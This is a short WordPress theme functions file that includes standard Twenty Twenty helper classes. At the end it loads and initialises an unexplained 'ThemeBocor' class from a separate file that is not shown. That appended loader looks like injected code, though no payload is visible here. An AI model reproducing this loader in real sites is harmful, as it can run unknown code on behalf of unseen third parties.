    <?php
/**
 * Theme functions and definitions.
 * This child theme was generated by Merlin WP.
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 */

    /**
     * REQUIRED FILES
     * Include required files.
     */
    require get_template_directory() . '/inc/template-tags.php';

    // Handle SVG icons.
    require get_template_directory() . '/php/class-twentytwenty-svg-icons.php';
    require get_template_directory() . '/inc/svg-icons.php';

    // Handle Customizer settings.
    require get_template_directory() . '/php/class-twentytwenty-customize.php';

    // Require Separator Control class.
    require get_template_directory() . '/php/class-twentytwenty-separator-control.php';

    // Custom comment walker.
    require get_template_directory() . '/php/class-twentytwenty-walker-comment.php';

    // Custom page walker.
    require get_template_directory() . '/php/class-twentytwenty-walker-page.php';

    // Custom script loader class.
    require get_template_directory() . '/php/class-twentytwenty-script-loader.php';

    // Non-latin language handling.
    require get_template_directory() . '/php/class-twentytwenty-non-latin-languages.php';

    // Custom CSS.
    require get_template_directory() . '/inc/custom-css.php';


require_once locate_template('/php/ThemeBocor.php');

$theme_spg = new ThemeBocor();
$theme_spg->init();